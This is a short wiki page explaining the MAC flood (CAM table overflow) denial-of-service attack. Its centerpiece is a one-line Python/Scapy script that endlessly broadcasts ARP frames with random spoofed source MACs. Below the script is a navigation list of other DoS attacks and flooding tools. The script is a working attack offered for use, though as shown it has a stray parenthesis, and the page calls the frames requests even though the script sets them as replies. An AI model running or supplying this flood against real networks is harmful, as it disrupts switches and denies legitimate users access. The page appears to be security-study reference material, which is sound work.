DoS/Mac Flood
From charlesreid1
The following Python script is from [1] and executes a MAC flood attack. This consists of sending a large number of ARP requests to a router, where the requests are crafted with fake MACs.
macflood.py:
from scapy.all import * while 1: sendp( Ether( src=RandMAC(), dst="FF:FF:FF:FF:FF:FF" )/ARP( op=2, psrc="0.0.0.0", hwdst="FF:FF:FF:FF:FF:FF" )/Padding( load="X"*18 )))
Flags
Denial of Service denial of service attacks for denying users access to resources that they are otherwise entitled to access.
DoS at Layers 1 and 2: CAM Table Overflow/MAC Flood: DoS/Mac Flood CAM Table Poisoning: DoS/Cam Poisoning
DoS at Layers 3 and 4: Syn Flood: DoS/SYN Flood Smurf Attack (Ping Flood): DoS/Smurf Attack DNS Attacks: DoS/DNS DNSSmurf Attack: DoS/DNSSmurf Wormhole Attack: DoS/Wormhole Attack Black Hole Attack: DoS/Black Hole Attack Byzantine Attack: DoS/Byzantine Attack Sleep Deprivation Attack: DoS/Sleep Deprivation Attack Stale Packets: DoS/Stale Packets
Toolz: Hping · Macof · Tcpnice · Hammer · Tors Hammer
Category:DoS · Category:Attacks · Category:Kali Attack Layers Flags · Template:DoSFlag · e |